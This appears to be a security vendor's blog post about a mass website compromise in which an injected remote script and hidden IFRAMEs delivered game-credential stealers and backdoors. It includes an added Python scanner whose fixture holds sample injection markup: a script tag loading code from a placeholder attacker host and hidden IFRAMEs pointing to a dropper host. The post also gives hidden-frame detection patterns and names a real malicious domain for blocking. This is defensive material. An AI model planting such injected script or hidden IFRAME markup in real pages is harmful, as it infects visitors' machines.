    Hidden IFRAMEs Launch Malware En Masse

    SANS reports that on November 6, hundreds of Web sites across the Internet were believed to have been compromised by an as yet unidentified attacker. Details about how and why the attack was carried out remain murky. What we know so far is that a script tag loading http://{BLOCKED}8.net/0.js was injected into the affected sites; that script leads to a page riddled with invisible IFRAMEs, and those IFRAMEs point to pages that automatically download several files onto the visitor's machine.
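    To show what the injection pattern described above looks like to a scanner, here is an added example (not code from the original post or from Trend Micro): a small Python checker that parses a page, flags a script tag whose src points off-site, flags IFRAMEs that are hidden by zero or one-pixel dimensions, display:none, visibility:hidden, or an off-screen offset, and collects the hostnames an administrator would feed into a gateway blocklist. The sample page and every hostname in it (evil.example, dropper.example, cdn.example) are constructed placeholders, not the real infrastructure from the incident.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page modelled on the incident: one injected remote
# script tag plus a set of IFRAMEs hidden in the usual ways. The hostnames
# are placeholders; the fourth IFRAME is a visible, legitimate-looking one
# so the scanner has something it must not flag.
INJECTED_PAGE = """
<html><body>
<h1>Welcome</h1>
<script src="http://evil.example/0.js"></script>
<iframe src="http://dropper.example/a.htm" width="0" height="0"></iframe>
<iframe src="http://dropper.example/b.htm" style="display:none"></iframe>
<iframe src="http://dropper.example/c.htm" style="position:absolute; left:-9999px"></iframe>
<iframe src="http://cdn.example/widget.html" width="300" height="200"></iframe>
</body></html>
"""

# Inline style fragments that make a frame invisible or push it off-screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*:\s*0*[01](?:px)?\b"
    r"|(?:left|top)\s*:\s*-\d+",
    re.I,
)


def is_hidden(attrs):
    """True if the frame's attributes or inline style make it invisible."""
    for dim in ("width", "height"):
        value = attrs.get(dim, "").strip().rstrip("px")
        if value.isdigit() and int(value) <= 1:
            return True
    return bool(HIDDEN_STYLE.search(attrs.get("style", "")))


class InjectionScanner(HTMLParser):
    """Records off-site script sources and hidden IFRAME sources."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        src = attrs.get("src")
        if not src:
            return
        host = urlparse(src).hostname
        if tag == "script" and host and host != self.site_host:
            self.findings.append(("external_script", src))
        elif tag == "iframe" and is_hidden(attrs):
            self.findings.append(("hidden_iframe", src))


def scan(html, site_host):
    """Return (kind, src) findings for a page served from site_host."""
    parser = InjectionScanner(site_host)
    parser.feed(html)
    return parser.findings


def hosts_to_block(findings):
    """Distinct hostnames referenced by the findings, for a gateway blocklist."""
    return sorted({urlparse(src).hostname for _, src in findings})


if __name__ == "__main__":
    found = scan(INJECTED_PAGE, "www.example.org")
    for kind, src in found:
        print(f"{kind:16s} {src}")
    print("block:", ", ".join(hosts_to_block(found)))
```

    The script check compares only the hostname against the site's own host, so a legitimate third-party script (a CDN, an analytics tag) will also be flagged; in practice the off-site findings are triaged against an allowlist rather than blocked blindly, while hidden IFRAMEs with no business purpose are the strong signal.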

    Some of the files are already proactively detected by generic patterns. The following are specific detections:

    • BKDR_DELF.HBW
    • TROJ_DELF.LGX
    • TROJ_DELF.MUF
    • TROJ_DELF.NHA
    • TROJ_DLOADER.QRE
    • TROJ_DLOADER.RZI
    • TROJ_DLOADER.SRD
    • TROJ_DOWQUE.ID
    • TROJ_DROPPER.CYP
    • TROJ_DROPPER.CZZ
    • TROJ_GENETIK.KK
    • TROJ_RISK.GD
    • TSPY_LEGMIR.CQQ
    • TSPY_ONLINEG.JCG
    • TSPY_ONLINEG.JVR
    • TSPY_ONLINEG.JZH
    • TSPY_ONLINEG.KCU
    • TSPY_ONLINEG.KEQ
    • TSPY_ONLINEG.KER
    • TSPY_ONLINEG.KES
    • TSPY_ONLINEG.KEU
    • TSPY_ONLINEG.KFH
    • TSPY_ONLINEG.KFJ
    • TSPY_ONLINEG.KFX
    • TSPY_ONLINEG.KGA
    • TSPY_ONLINEG.KGB
    • TSPY_ONLINEG.KGE
    • TSPY_ONLINEG.KGT
    • TSPY_ONLINEG.KWB
    • TSPY_ONLINEG.LMB
    • TSPY_ONLINEG.LPE
    • TSPY_QQGAME.HG
    • TSPY_QQGAME.HQ
    • TSPY_QQPASS.DCI
    • TSPY_WOW.AJZ
    • TSPY_WOW.AKA
    • TSPY_WOW.AKO
    • WORM_QQPASS.DCH

    A rundown of the forty-plus files gives us Trojans, spyware, backdoors, and a worm from families including, but not limited to, ONLINEG, WOW, QQPASS, and QQGAME, which are known information stealers targeting online gamers and QQ users. File sizes range from 2 KB to 177 KB, with the largest being the backdoors. Backdoors open ports on an infected machine, giving a remote attacker control over the system.

    Users who visit any of the compromised sites run the risk of infection, so gateway administrators should block traffic to and from yl18.net. Trend Micro advises users to deploy technology such as its Total Web Threat Protection to remain as secure as possible; Trend Micro Web threat protection technology protects users throughout the network, at the gateway, and in the Internet cloud.


    © Copyright 2011 Trend Micro Inc. All rights reserved. Legal Notice